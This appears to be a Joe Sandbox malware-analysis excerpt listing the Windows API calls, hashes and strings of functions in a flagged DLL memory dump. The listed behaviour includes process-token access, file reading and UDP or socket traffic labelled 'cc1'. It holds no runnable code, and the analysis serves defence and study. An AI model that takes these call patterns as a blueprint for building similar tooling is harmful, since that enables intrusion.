                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 100289E8
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00000000), ref: 100289FB
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,00000000,00000000), ref: 10028A23
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?,00000000), ref: 10028A38
                                                      • LocalAlloc.KERNEL32(00000040,00000001,?,?,00000000,?,?,?,?,00000000,00000000), ref: 10028A47
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,00000000,?,?,?,?,00000000), ref: 10028A62
                                                      • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,00000000,00000000), ref: 10028A90
                                                      • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,00000000,00000000), ref: 10028A97
                                                      • _memmove.LIBCMT ref: 10028ABE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharLocalMultiWide$AllocFree$_memmove
                                                      • String ID:
                                                      • API String ID: 4220682249-0
                                                      • Opcode ID: 2f1a7f7ee304bd94a922dd5f900a94e23e2b021bb6a72a085586578122ebdc68
                                                      • Instruction ID: cd255971460cc628536006e1a77beb6d2239b6b8ba9b72674e75f7d8536ed572
                                                      • Opcode Fuzzy Hash: 2f1a7f7ee304bd94a922dd5f900a94e23e2b021bb6a72a085586578122ebdc68
                                                      • Instruction Fuzzy Hash: 2751B178A00306AFFB24CF68DC95FAEBBB5EB48710F540619F512AB6C0DB716944CB61
                                                      APIs
                                                        • Part of subcall function 100251A0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100251C5
                                                        • Part of subcall function 100251A0: SwitchToThread.KERNEL32(?,?,?,?,?,1002240E), ref: 100251E9
                                                        • Part of subcall function 100251A0: Sleep.KERNEL32(00000001,?,?,?,?,?,1002240E), ref: 100251FB
                                                      • SetLastError.KERNEL32(000010DD), ref: 100260CD
                                                        • Part of subcall function 10026240: WSASetLastError.WS2_32(0000273F), ref: 100262A3
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 10025FEA
                                                      • GetLastError.KERNEL32 ref: 10026062
                                                        • Part of subcall function 10026390: WSAEventSelect.WS2_32(?,?,00000030), ref: 100263A4
                                                        • Part of subcall function 10026390: connect.WS2_32(?,00000000,0000001C), ref: 100263CC
                                                        • Part of subcall function 10026390: WSAGetLastError.WS2_32(?,10026009,?,00000000), ref: 100263DF
                                                      • WSAGetLastError.WS2_32(?,00000000), ref: 10026053
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 10026077
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?), ref: 10026086
                                                      • SetLastError.KERNEL32(00000000), ref: 1002609A
                                                      • GetLastError.KERNEL32 ref: 100260B1
                                                      • SetLastError.KERNEL32(00000000), ref: 100260BD
                                                        • Part of subcall function 10026330: bind.WS2_32(?,00000000,00000010), ref: 10026357
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$CompareEventExchangeInterlockedSelectSleepSwitchThreadbindconnect
                                                      • String ID:
                                                      • API String ID: 62954821-0
                                                      • Opcode ID: 0463821f4ad289b948d68cbd4809ac1d1d7892450be1f17897d28704699a627d
                                                      • Instruction ID: e34a75ea22bd95397cfec8099c68b8bafc6c6bcc9b5293f9479f0a879be0e4df
                                                      • Opcode Fuzzy Hash: 0463821f4ad289b948d68cbd4809ac1d1d7892450be1f17897d28704699a627d
                                                      • Instruction Fuzzy Hash: D5518A7060060AAFE750CFA5DC84B9EFBB9FF48300F80811AE90587690DBB5A820CF91
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100104E9
                                                        • Part of subcall function 1000C213: __EH_prolog.LIBCMT ref: 1000C218
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 1001052F
                                                      • Process32First.KERNEL32(00000000,?), ref: 1001054E
                                                      • lstrcmpA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?), ref: 10010587
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 100105A7
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 100105B5
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?), ref: 100105E5
                                                      • OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?), ref: 100105F2
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 100105FB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseH_prologHandleOpenProcessProcess32$CreateFirstNextSnapshotTokenToolhelp32lstrcmp
                                                      • String ID:
                                                      • API String ID: 1332722264-0
                                                      • Opcode ID: 4a41a6bdfa66efb0e501efd1c46497dcc14bd6281253315d37dc36e56c92a601
                                                      • Instruction ID: b62764b0414d32b709b223facb62bba5ffd3a5644e312f6732ebb2b98ad689ba
                                                      • Opcode Fuzzy Hash: 4a41a6bdfa66efb0e501efd1c46497dcc14bd6281253315d37dc36e56c92a601
                                                      • Instruction Fuzzy Hash: EA316D75A00228AFEB10EFA4CC99EEEBB79FF04394F004469F51696191DF74AB44CA60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10012B9E
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                        • Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17
                                                      • _free.LIBCMT ref: 10012D24
                                                      • _free.LIBCMT ref: 10012D39
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$_free
                                                      • String ID: device$plug_id$sid$start
                                                      • API String ID: 2563830877-3941425863
                                                      • Opcode ID: 06f33c6a7afceeb669533de6c43c198a8ef68df219ee55a0d66d9019832dd33a
                                                      • Instruction ID: ca6ef6190c7e70453a8e314b231011d620bcf2d808ffe24bc5883f0540a4f65c
                                                      • Opcode Fuzzy Hash: 06f33c6a7afceeb669533de6c43c198a8ef68df219ee55a0d66d9019832dd33a
                                                      • Instruction Fuzzy Hash: 5E51D2B1900188AEEF05DF74CD45BEEBBB9EF85340F1441ADE406A7196DB706E89CB60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000456D
                                                      • __wfopen_s.LIBCMT ref: 100045DC
                                                      • CreateFileA.KERNEL32(?,00000000,00000001,00000000,00000003,00000080,00000000), ref: 100045FB
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 10004625
                                                      • CloseHandle.KERNEL32(00000000), ref: 1000462C
                                                      • __fread_nolock.LIBCMT ref: 1000465A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateH_prologHandleSize__fread_nolock__wfopen_s
                                                      • String ID: Get file size failed!
                                                      • API String ID: 2615374186-588257513
                                                      • Opcode ID: e0b5637183cde497578a0dcd03e8d4d4129d0fda55b36cff8f3b76bf11604ced
                                                      • Instruction ID: 0f310d6fd00b9f6b04008b82b283a21e80cb63aa65aa8e7d48c89f91d565bf33
                                                      • Opcode Fuzzy Hash: e0b5637183cde497578a0dcd03e8d4d4129d0fda55b36cff8f3b76bf11604ced
                                                      • Instruction Fuzzy Hash: 0041E3B6900608BFEB12DBA4CC46FEEB779EF05351F108026FA04F6191DF746A448B66
                                                      APIs
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 10015987
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,1000FD6E,00000000), ref: 10015996
                                                      • htons.WS2_32(00005CE3), ref: 100159AA
                                                      • inet_addr.WS2_32(1000FD6E), ref: 100159C0
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00000020,?,00000001), ref: 100159DB
                                                      • sendto.WS2_32(00000000,?,?,00000000,?,00000010), ref: 10015A1A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLasthtonsinet_addrsendtosetsockoptsocket
                                                      • String ID: cc1
                                                      • API String ID: 2322301496-2866713653
                                                      • Opcode ID: 80009e3e445d42a75802dd211e57e40ae3bf450ebc27584ef9ca9705ea11fd59
                                                      • Instruction ID: dc1c817a59feb693c876c12f7c11bb04391d40de1794ccaeec7b292ec1146153
                                                      • Opcode Fuzzy Hash: 80009e3e445d42a75802dd211e57e40ae3bf450ebc27584ef9ca9705ea11fd59
                                                      • Instruction Fuzzy Hash: E1219235540219BFEB00DFA4CC85EEE7BBCEF09350F448626F511AA091D7B1E689CBA1
                                                      APIs
                                                      • DeleteCriticalSection.KERNEL32(00000018,1005099E,1001E5A8,?,93656AD3,?,?,?,1005099E,000000FF), ref: 10020DCE
                                                      • HeapFree.KERNEL32(?,00000000,00000000,?,93656AD3,?,?,?,1005099E,000000FF), ref: 10020DD9
                                                      • _free.LIBCMT ref: 10020E9D
                                                      • DeleteCriticalSection.KERNEL32(00000018,?), ref: 10020EFE
                                                      • HeapFree.KERNEL32(?,00000000,00000000), ref: 10020F09
                                                      • _free.LIBCMT ref: 10020F32
                                                      • HeapDestroy.KERNEL32(?,00000001,?), ref: 10020F77
                                                      • HeapCreate.KERNEL32(?,?,?,00000001,?), ref: 10020F86
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$CriticalDeleteFreeSection_free$CreateDestroy
                                                      • String ID:
                                                      • API String ID: 2421925453-0
                                                      • Opcode ID: 1ef0eb3b71c5151f6281f769c611efdfeca0364fa8ac9954e33d151b24c49d21
                                                      • Instruction ID: 72729a094172b974382ca148bb2a68799dd086976ebad57966e83bfde928c9b9
                                                      • Opcode Fuzzy Hash: 1ef0eb3b71c5151f6281f769c611efdfeca0364fa8ac9954e33d151b24c49d21
                                                      • Instruction Fuzzy Hash: CA817A75A00616DFDB10CFA4C884BAEFBF5FF08304F004569E919AB252D775B948CBA0
                                                      APIs
                                                      • PostQueuedCompletionStatus.KERNEL32(?,000000F1,00000000,00000000,93656AD3,?,00000000,00000000,?,?,?,00000000), ref: 10023AE3
                                                      • _memmove.LIBCMT ref: 10023B7D
                                                        • Part of subcall function 10022A20: EnterCriticalSection.KERNEL32(?), ref: 10022A54
                                                        • Part of subcall function 10022A20: LeaveCriticalSection.KERNEL32(?), ref: 10022A6F
                                                        • Part of subcall function 10022A20: timeGetTime.WINMM(?,00000000), ref: 10022AAE
                                                      • setsockopt.WS2_32(?,0000FFFF,0000700B,?,00000004), ref: 10023BA9
                                                      • CreateIoCompletionPort.KERNEL32(?,?,00000000,00000000,?,00000000), ref: 10023BB8
                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 10023BD4
                                                      • shutdown.WS2_32(?,00000002), ref: 10023C30
                                                      • closesocket.WS2_32(?), ref: 10023C37
                                                      • HeapFree.KERNEL32(?,00000000,?,?), ref: 10023C55
                                                        • Part of subcall function 10022970: timeGetTime.WINMM(?,?), ref: 100229A4
                                                        • Part of subcall function 10022970: HeapAlloc.KERNEL32(?,00000000,0000008C,?,?), ref: 100229D3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CompletionCriticalHeapSectionTimetime$AllocCreateEnterErrorFreeLastLeavePortPostQueuedStatus_memmoveclosesocketsetsockoptshutdown
                                                      • String ID:
                                                      • API String ID: 4126795834-0
                                                      • Opcode ID: 3d74f2f2346b9e5e2997d44cfee395f9f00e06346d473ee4a727974a3047ff4a
                                                      • Instruction ID: c3c4a6c590342b960d4fb879bec7ec832b813c069d8f557c9089d79be9513b4c
                                                      • Opcode Fuzzy Hash: 3d74f2f2346b9e5e2997d44cfee395f9f00e06346d473ee4a727974a3047ff4a
                                                      • Instruction Fuzzy Hash: 6F519F71600219BFEB15CF94DC86FAEBBB9FF08310F50811AFA15A62D0DB75A904CB90
                                                      APIs
                                                      • __mtinitlocknum.LIBCMT ref: 1004893B
                                                        • Part of subcall function 100379EE: __FF_MSGBANNER.LIBCMT ref: 10037A03
                                                        • Part of subcall function 100379EE: __NMSG_WRITE.LIBCMT ref: 10037A0A
                                                        • Part of subcall function 100379EE: __malloc_crt.LIBCMT ref: 10037A2A
                                                      • __lock.LIBCMT ref: 1004894E
                                                      • __lock.LIBCMT ref: 1004899A
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,1005FB40,00000018,1004BCB1,1000DD8F,00000000,00000109), ref: 100489B6
                                                      • EnterCriticalSection.KERNEL32(8000000C,1005FB40,00000018,1004BCB1,1000DD8F,00000000,00000109), ref: 100489D3
                                                      • LeaveCriticalSection.KERNEL32(8000000C), ref: 100489E3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 1422805418-0
                                                      • Opcode ID: be17f33b865f95c0875abed3820e53539dfe9872d279ce3090774119e8ca9411
                                                      • Instruction ID: 59e510b657f4a160520aa340233b794b6cc5843ca85406e28c707bcbb423cc72
                                                      • Opcode Fuzzy Hash: be17f33b865f95c0875abed3820e53539dfe9872d279ce3090774119e8ca9411
                                                      • Instruction Fuzzy Hash: 064126719006529BFB14CFA8CC9575CB7A0EF01365F35472AE524EB2C1C7B4AE54CB85
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: htons$_free_malloc_memmove_strtoksendto
                                                      • String ID:
                                                      • API String ID: 2957226208-0
                                                      • Opcode ID: 1377283de9c2cf520224e8a1fa0e1bb336073e387463bc6137fc35ef034d5acf
                                                      • Instruction ID: bfe267d7f567e0675f2bf13e0c9f13a44900987cbada512c2f353ae635174d3d
                                                      • Opcode Fuzzy Hash: 1377283de9c2cf520224e8a1fa0e1bb336073e387463bc6137fc35ef034d5acf
                                                      • Instruction Fuzzy Hash: 4C31E639900214AFCB11CFA4CC41ABABBF8EF08350F04819AFD55DF292E771E9518BA4
                                                      APIs
                                                      • WSAEventSelect.WS2_32(?,?,00000030), ref: 100263A4
                                                      • connect.WS2_32(?,00000000,0000001C), ref: 100263CC
                                                      • WSAGetLastError.WS2_32(?,10026009,?,00000000), ref: 100263DF
                                                      • connect.WS2_32(?,00000000,0000001C), ref: 1002640F
                                                      • WSAEventSelect.WS2_32(?,?,00000023), ref: 10026422
                                                      • SetLastError.KERNEL32(00000000,?,10026009,?,00000000), ref: 1002643D
                                                      • GetLastError.KERNEL32(?,10026009,?,00000000), ref: 10026452
                                                      • WSASetLastError.WS2_32(00000000,?,10026009,?,00000000), ref: 10026463
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EventSelectconnect
                                                      • String ID:
                                                      • API String ID: 371153081-0
                                                      • Opcode ID: 54afe04ce1d9cf9f21d3b39e61d792278d7fa797bcda66940024414513743954
                                                      • Instruction ID: 52ca4863fcde4b83e53eff6488bf04bcb13c55dc1b2842da82c1cb5a4742651c
                                                      • Opcode Fuzzy Hash: 54afe04ce1d9cf9f21d3b39e61d792278d7fa797bcda66940024414513743954
                                                      • Instruction Fuzzy Hash: 9421C6302006119BF7249F60EC89B6A77AAEF44721F504628F596C65E0C7B6DC949B60
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • _wcscmp.LIBCMT ref: 1004437D
                                                      • _wcscmp.LIBCMT ref: 10044393
                                                      • ___lc_wcstolc.LIBCMT ref: 100443BF
                                                      • ___get_qualified_locale.LIBCMT ref: 100443E4
                                                        • Part of subcall function 1004A78D: _TranslateName.LIBCMT ref: 1004A7CD
                                                        • Part of subcall function 1004A78D: _GetLocaleNameFromLangCountry.LIBCMT ref: 1004A7E6
                                                        • Part of subcall function 1004A78D: _TranslateName.LIBCMT ref: 1004A801
                                                        • Part of subcall function 1004A78D: _GetLocaleNameFromLangCountry.LIBCMT ref: 1004A817
                                                        • Part of subcall function 1004A78D: IsValidCodePage.KERNEL32(00000000,?,?,00000055,?,?,100443E9,?,?,?,?,00000004,?,00000000), ref: 1004A86B
                                                      • GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 1004447B
                                                      • _memmove.LIBCMT ref: 10044531
                                                      • __invoke_watson.LIBCMT ref: 10044586
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Name$CountryFromLangLocaleTranslate_wcscmp$CodePageValid___get_qualified_locale___lc_wcstolc__amsg_exit__getptd_noexit__invoke_watson_memmove
                                                      • String ID:
                                                      • API String ID: 3739364018-0
                                                      • Opcode ID: 780446970f9145ecf884e25bb577454b131f8547c3ee739ad5612f4a18112756
                                                      • Instruction ID: ff94cb8106a5d527924046aadc737bfe104d0811a886c723f0991959bc7079a2
                                                      • Opcode Fuzzy Hash: 780446970f9145ecf884e25bb577454b131f8547c3ee739ad5612f4a18112756
                                                      • Instruction Fuzzy Hash: 76717E76900656ABDB21DF65CC41BEE77B9EF45350F2204B6FD08E6142EF309E808B99
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10012763
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _free.LIBCMT ref: 100128EA
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
